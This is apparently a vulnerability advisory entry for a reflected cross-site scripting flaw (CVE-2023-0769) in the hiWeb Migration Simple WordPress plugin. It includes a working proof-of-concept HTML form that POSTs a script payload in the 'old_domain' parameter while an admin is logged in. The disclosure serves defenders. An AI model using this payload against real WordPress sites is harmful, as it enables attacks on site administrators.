Lucene search
Shreya PohekarWPEX-ID:1D4A2F0E-A371-4E27-98DE-528E070F41B0HistoryApr 12, 2023 - 12:00 a.m.
hiWeb Migration Simple <= 2.0.0.1 Reflected Cross-Site Scripting
2023-04-1200:00:00
Shreya Pohekar
82
xss
web migration simple
admin login
cross-site scripting
0.0005 Low
EPSS
Percentile
17.0%
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins. The hiweb-migration-simple plugin is vulnerable to POST based XSS on endpoint http://172.28.128.6/wordpress/wp-admin/tools.php?page=hw_migration_simple via POST parameter old_domain. This happens because of improper handling of user supplied input that is reflected on the page.
1. Login as Admin.
2. Open the .html file in the same browser session.
```
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://172.28.128.6/wordpress/wp-admin/tools.php?page=hw_migration_simple" method="POST">
<input type="hidden" name="old_domain" value="<script>alert(document.domain)</script>" />
<input type="hidden" name="new_domain" value="http://qwer.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
3. XSS will be triggered.Related
nvd
nvd
CVE-2023-0769
2024-01-16 16:15:10
prion
prion
Cross site scripting
2024-01-16 16:15:00
cvelist
cvelist
cve
cve
CVE-2023-0769
2024-01-16 16:15:10
wpvulndb
wpvulndb
hiWeb Migration Simple <= 2.0.0.1 Reflected Cross-Site Scripting
2023-04-12 00:00:00
wordfence
wordfence